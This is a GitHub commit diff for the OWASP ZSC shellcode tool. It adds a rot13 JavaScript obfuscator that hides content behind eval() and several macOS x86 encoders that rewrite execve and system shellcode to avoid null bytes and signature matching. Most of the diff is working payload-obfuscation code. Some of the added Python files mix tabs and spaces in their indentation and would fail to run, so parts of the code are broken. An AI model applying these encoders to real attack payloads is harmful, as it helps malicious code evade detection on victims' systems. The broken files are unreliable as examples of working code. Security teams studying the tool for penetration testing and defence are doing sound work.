Merge pull request #120 from rnikhil275/code_sprint_dev (OWASP Code S…

…print 2017) rot13 obfuscation and encoding for macOS_x86 shellcodes (exec and system shellcodes) (OWASP Code Sprint 2017)
OWASP · Jul 19, 2017 · c4e9e34 · c4e9e34
2 parents 667211a + 97d9333
commit c4e9e34
Show file tree

Hide file tree

Showing 20 changed files with 988 additions and 27 deletions.
diff --git a/core/commands.py b/core/commands.py
@@ -109,9 +109,8 @@
           },
           'osx_x86':  #generate sub command - os name
           {
-              'exec': {'file_to_execute': ['none']},  #function of shellcode
-              'system':
-              {'command_to_execute': ['none']},  #function of shellcode
+              'exec': {'file_to_execute': ['none', 'add_random', 'add_yourvalue', 'dec', 'dec_timesyouwant', 'inc', 'inc_timesyouwant', 'sub_random', 'sub_yourvalue', 'xor_random', 'xor_yourvalue']},  #function of shellcode
+              'system':{'command_to_execute': ['none', 'add_random', 'add_yourvalue', 'dec', 'dec_timesyouwant', 'inc_timesyouwant', 'inc','sub_random', 'sub_yourvalue', 'xor_random', 'xor_yourvalue']},  #function of shellcode
               'chmod': {'file_to_perm&&perm_number':
                         ['none']},  # function of shellcode
           },
@@ -129,16 +128,16 @@
         {
             'javascript':  #langauge name
             ['simple_hex', 'base64', 'simple_hex_rev', 'simple_base64_rev',
-             'simple_ascii'],  #encode types
+             'simple_ascii', 'rot13'],  #encode types
             'python':
-            ['simple_hex', 'simple_hex_rev', 'simple_base64_rev', 'simple_ascii'],
+            ['simple_hex', 'simple_hex_rev', 'simple_base64_rev', 'simple_ascii', 'rot13'],
             'php':
-            ['simple_hex', 'base64', 'simple_hex_rev', 'base64_rev', 'simple_ascii'],
+            ['simple_hex', 'base64', 'simple_hex_rev', 'base64_rev', 'simple_ascii', 'rot13'],
             'perl':
             ['simple_hex', 'base64', 'simple_hex_rev', 'simple_base64_rev', 
-             'simple_ascii'],
+             'simple_ascii', 'rot13'],
             'ruby':
-            ['simple_hex', 'base64', 'simple_hex_rev', 'base64_rev', 'simple_ascii'],
+            ['simple_hex', 'base64', 'simple_hex_rev', 'base64_rev', 'simple_ascii', 'rot13'],
         }
     ],
     'back': ['Go back one step', ''],

diff --git a/core/encode.py b/core/encode.py
@@ -76,4 +76,35 @@ def encode_process(encode, shellcode, os, func):
         elif 'sub_' in encode:
             from lib.encoder.windows_x86.sub_yourvalue import start
             return start(encode, shellcode, func)
+    elif 'osx_x86' == os:
+        if encode == 'add_random':
+            from lib.encoder.osx_x86.add_random import start
+            return start(shellcode, func)
+        elif 'add_' in encode:
+            from lib.encoder.osx_x86.add_yourvalue import start
+            return start(encode, shellcode, func)
+        elif encode == 'dec':
+            from lib.encoder.osx_x86.dec import start
+            return start(shellcode, func)
+        elif 'dec_' in encode:
+            from lib.encoder.osx_x86.dec_timesyouwant import start
+            return start(encode, shellcode, func)
+        elif encode == 'inc':
+            from lib.encoder.osx_x86.inc import start
+            return start(shellcode, func)
+        elif 'inc_' in encode:
+            from lib.encoder.osx_x86.inc_timesyouwant import start
+            return start(encode, shellcode, func)
+        elif encode == 'sub_random':
+            from lib.encoder.osx_x86.sub_random import start
+            return start(shellcode, func)
+        elif 'sub_' in encode:
+            from lib.encoder.osx_x86.sub_yourvalue import start
+            return start(encode, shellcode, func)
+        elif encode == 'xor_random':
+            from lib.encoder.osx_x86.xor_random import start
+            return start(shellcode, func)
+        elif 'xor_' in encode:
+            from lib.encoder.osx_x86.xor_yourvalue import start
+            return start(encode, shellcode, func)
     return shellcode
diff --git a/lib/encoder/javascript/rot13.py b/lib/encoder/javascript/rot13.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python
+'''
+OWASP ZSC
+https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
+https://github.com/zscproject/OWASP-ZSC
+http://api.z3r0d4y.com/
+https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
+'''
+import binascii
+import random
+import string
+import codecs
+from core.compatible import version
+_version = version()
+
+
+def encode(f):
+    base64_arr = ''
+    val_name = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    data = ''
+    if _version is 2:
+        data = val_name + '= ` ' + str(f.encode("rot13")) + '`;'
+    if _version is 3:
+        data = val_name + '= `' + str(codecs.encode(f, "rot-13")) + '`;'
+    var_b64 = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    var_str = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    var_data = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    func_name = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    func_argv = ''.join(
+        random.choice(string.ascii_lowercase + string.ascii_uppercase)
+        for i in range(50))
+    f = '''
+%s
+function rot(s) {
+    return s.replace(/[a-zA-Z]/g, function (c) {
+        return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
+    });
+}
+function %s(%s) {
+    return rot(%s);
+
+
+}
+eval(%s(%s));''' % (data, func_name, func_argv, func_argv, func_name, val_name)
+    return f
+
+
+def start(content,cli):
+    return str(str('/*\n') + str(content.replace('*/', '*_/')) + str('\n*/') +
+               str(encode(content)) + str('\n'))
diff --git a/lib/encoder/osx_x86/__init__.py b/lib/encoder/osx_x86/__init__.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+'''
+OWASP ZSC
+https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
+https://github.com/zscproject/OWASP-ZSC
+http://api.z3r0d4y.com/
+https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
+'''
+
+pass
diff --git a/lib/encoder/osx_x86/add_random.py b/lib/encoder/osx_x86/add_random.py
@@ -0,0 +1,79 @@
+#!/usr/bin/env python
+'''
+OWASP ZSC
+https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
+https://github.com/zscproject/OWASP-ZSC
+http://api.z3r0d4y.com/
+https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
+'''
+import random, binascii, string
+from core.compatible import version
+_version = version()
+chars = string.digits + string.ascii_letters
+
+def start(shellcode, job):
+	if "exec" == job:
+		t = True
+		eax = str('0x3b')
+		while t:
+			if _version is 2:
+				eax_1 = binascii.b2a_hex(''.join(random.choice(chars)
+												 for i in range(1)))
+			if _version is 3:
+				eax_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(1))).encode('latin-1'))).decode('latin-1')
+			eax_1 = str('0') + str(eax_1[1])
+			eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16))
+			if eax > eax_1:
+				if '00' not in str(eax_1) and '00' not in str(eax_2):
+					t = False
+
+		A = 0
+		eax = 'push   $%s' % (str(eax))
+		if '-' in eax_2:
+			A = 1
+			eax_2 = eax_2.replace('-', '')
+			eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\n' % (eax_2, eax_1)
+
+		if A is 0:
+			eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\n' % (eax_2,eax_1)
+		shellcode = shellcode.replace('mov    $0x3b,%al', eax_add)
+
+		for line in shellcode.rsplit('\n'):
+			if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14:
+				data = line.rsplit('push')[1].rsplit('$0x')[1]
+				t = True
+				while t:
+					if _version is 2:
+						ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4)))
+					if _version is 3:
+						ebx_1 = (binascii.b2a_hex((''.join(random.choice(chars) for i in range(4))).encode('latin-1'))).decode('latin-1')
+					ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16))
+					if str('00') not in str(ebx_1) and str('00') not in str(ebx_2) and '-' in ebx_2 and len(ebx_2.replace('-', '')) >= 7 and len(ebx_1) >= 7 and '-' not in ebx_1:
+						ebx_2 = ebx_2.replace('-', '')
+						command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2))
+						shellcode = shellcode.replace(line, command)
+						t = False
+	if 'system' == job:
+
+		for line in shellcode.rsplit('\n'):
+			if 'push' in line and '$0x' in line and ',' not in line and len(line) > 14:
+				# print(line)
+				data = line.rsplit('push')[1].rsplit('$0x')[1]
+				# print(data)
+				t = True
+				while t:
+					if _version is 2:
+						ebx_1 = binascii.b2a_hex(''.join(random.choice(chars)for i in range(4)))
+
+					if _version is 3:
+						ebx_1 = (binascii.b2a_hex((''.join(random.choice(
+							chars) for i in range(4))).encode('latin-1'))
+								 ).decode('latin-1')
+					if data<ebx_1:
+						ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16))
+						if str('00') not in str(ebx_1) and str('00') not in str(ebx_2) and '-' in ebx_2 and len(ebx_2) >= 7 and len(ebx_1) >= 7 and '-' not in ebx_1:
+							ebx_2 = ebx_2.replace('-', '')
+							command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (str(ebx_1), str(ebx_2))
+							shellcode = shellcode.replace(line, command)
+							t = False
+	return shellcode
diff --git a/lib/encoder/osx_x86/add_yourvalue.py b/lib/encoder/osx_x86/add_yourvalue.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python
+'''
+OWASP ZSC
+https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
+https://github.com/zscproject/OWASP-ZSC
+http://api.z3r0d4y.com/
+https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
+'''
+
+def start(type, shellcode, job):
+	if "exec" == job:
+		value = str(type.rsplit('add_')[1][2:])
+        t = True
+        eax = str('0x3b909090')
+        eax_1 = value
+        eax_2 = "%x" % (int(eax, 16) - int(eax_1, 16))
+        A = 0
+        eax = 'push   $%s' % (str(eax))
+        if '-' in eax_2:
+            A = 1
+            eax_2 = eax_2.replace('-', '')
+            eax_add = 'push $0x%s\npop %%eax\nneg %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+                eax_2, eax_1)
+
+        if A is 0:
+            eax_add = 'push $0x%s\npop %%eax\nadd $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+                eax_2, eax_1)
+        shellcode = shellcode.replace('mov    $0x3b,%al', eax_add)
+        A = 0
+        for line in shellcode.rsplit('\n'):
+            if '_z3r0d4y_' in line:
+                A = 1
+            if 'push' in line and '$0x' in line and ',' not in line and len(
+                    line) > 14 and A is 1:
+                data = line.rsplit('push')[1].rsplit('$0x')[1]
+                t = True
+                while t:
+                    ebx_1 = value
+                    ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16))
+
+                    if str('00') not in str(ebx_1) and str('00') not in str(
+                            ebx_2) and len(ebx_2) >= 7 and len(
+                                ebx_1) >= 7 and '-' not in ebx_1:
+                        ebx_2 = ebx_2.replace('-', '')
+                        command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (
+                            str(ebx_1), str(ebx_2))
+                        shellcode = shellcode.replace(line, command)
+                        t = False
+        shellcode = shellcode.replace('_z3r0d4y_', '')
+
+	if "system" == job:
+		value = str(type.rsplit('add_')[1][2:])
+
+        for line in shellcode.rsplit('\n'):
+            if 'push' in line and '$0x' in line and ',' not in line and len(
+                    line) > 14:
+                data = line.rsplit('push')[1].rsplit('$0x')[1]
+                ebx_1 = value
+                ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16))
+                A = 0
+                if str('-') in str(ebx_2):
+                    ebx_2 = ebx_2.replace('-', '')
+                    command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (
+                        str(ebx_1), str(ebx_2))
+                    A = 1
+                if A is 0:
+                    command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nadd %%ebx,%%eax\npush %%eax\n' % (
+                        str(ebx_1), str(ebx_2))
+                shellcode = shellcode.replace(line, command)
+
+
+	return shellcode
diff --git a/lib/encoder/osx_x86/dec.py b/lib/encoder/osx_x86/dec.py
@@ -0,0 +1,40 @@
+def start(shellcode, job):
+	if "exec" == job:
+		t = True
+		eax = str('0x3b909090')
+		eax_2 = "%x" % (int(eax, 16) + int('0x01', 16))
+		A = 0
+		eax = 'push   $%s' % (str(eax))
+		if '-' in eax_2:
+			A = 1
+			eax_2 = eax_2.replace('-', '')
+			eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+				eax_2)
+
+		if A is 0:
+			eax_add = 'push $0x%s\npop %%eax\ndec %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+				eax_2)
+		shellcode = shellcode.replace('mov    $0x3b,%al', eax_add)
+
+		A = 0
+		for line in shellcode.rsplit('\n'):
+			if '_z3r0d4y_' in line:
+				A = 1
+			if 'push' in line and '$0x' in line and ',' not in line and len(
+					line) > 14 and A is 1:
+				data = line.rsplit('push')[1].rsplit('$0x')[1]
+				ebx_2 = "%x" % (int(data, 16) + int('0x01', 16))
+				command = '\npush $0x%s\npop %%ebx\ndec %%ebx\npush %%ebx\n' % (
+					str(ebx_2))
+				shellcode = shellcode.replace(line, command)
+		shellcode = shellcode.replace('_z3r0d4y_', '')
+
+	if "system" == job:
+		for line in shellcode.rsplit('\n'):
+			if 'push' in line and '$0x' in line and ',' not in line and len(
+					line) > 14:
+				data = line.rsplit('push')[1].rsplit('$0x')[1]
+				ebx_2 = "%x" % (int(data, 16) + int('01', 16))
+				command = '\npush $0x%s\npop %%eax\ndec %%eax\npush %%eax\n' % (str(ebx_2))
+				shellcode = shellcode.replace(line, command)
+	return shellcode
diff --git a/lib/encoder/osx_x86/dec_timesyouwant.py b/lib/encoder/osx_x86/dec_timesyouwant.py
@@ -0,0 +1,55 @@
+def start(type, shellcode, job):
+	if "exec" == job:
+		times = int(type.rsplit('dec_')[1])
+        t = True
+        eax_2, eax = str('0x3b909090'), str('0x3b909090')
+        n = 0
+        while n < times:
+            eax_2 = "%x" % (int(eax_2, 16) + int('0x01', 16))
+            n += 1
+        dec = 'dec %eax\n' * n
+        A = 0
+        eax = 'push   $%s' % (str(eax))
+        if '-' in eax_2:
+            A = 1
+            eax_2 = eax_2.replace('-', '')
+            eax_add = 'push $0x%s\npop %%eax\n%s\nneg %%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+                eax_2, dec)
+
+        if A is 0:
+            eax_add = 'push $0x%s\npop %%eax\n%s\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % (
+                eax_2, dec)
+        shellcode = shellcode.replace('mov    $0x3b,%al', eax_add)
+
+        A = 0
+        for line in shellcode.rsplit('\n'):
+            if '_z3r0d4y_' in line:
+                A = 1
+            if 'push' in line and '$0x' in line and ',' not in line and len(
+                    line) > 14 and A is 1:
+                ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1]
+                n = 0
+                while n < times:
+                    ebx_2 = "%x" % (int(ebx_2, 16) + int('0x01', 16))
+                    n += 1
+                dec = 'dec %ebx\n' * n
+                command = '\npush $0x%s\npop %%ebx\n%s\npush %%ebx\n' % (
+                    str(ebx_2), dec)
+                shellcode = shellcode.replace(line, command)
+        shellcode = shellcode.replace('_z3r0d4y_', '')
+    if "system" == job:
+    	times = int(type.rsplit('dec_')[1])
+    	for line in shellcode.rsplit('\n'):
+            if 'push' in line and '$0x' in line and ',' not in line and len(
+                    line) > 14:
+                ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1]
+                n = 0
+                while n < times:
+                    ebx_2 = "%x" % (int(ebx_2, 16) + int('01', 16))
+                    n += 1
+                dec = 'dec %eax\n' * n
+                command = '\npush $0x%s\npop %%eax\n%spush %%eax\n' % (
+                    str(ebx_2), str(dec))
+                shellcode = shellcode.replace(line, command)
+
+	return shellcode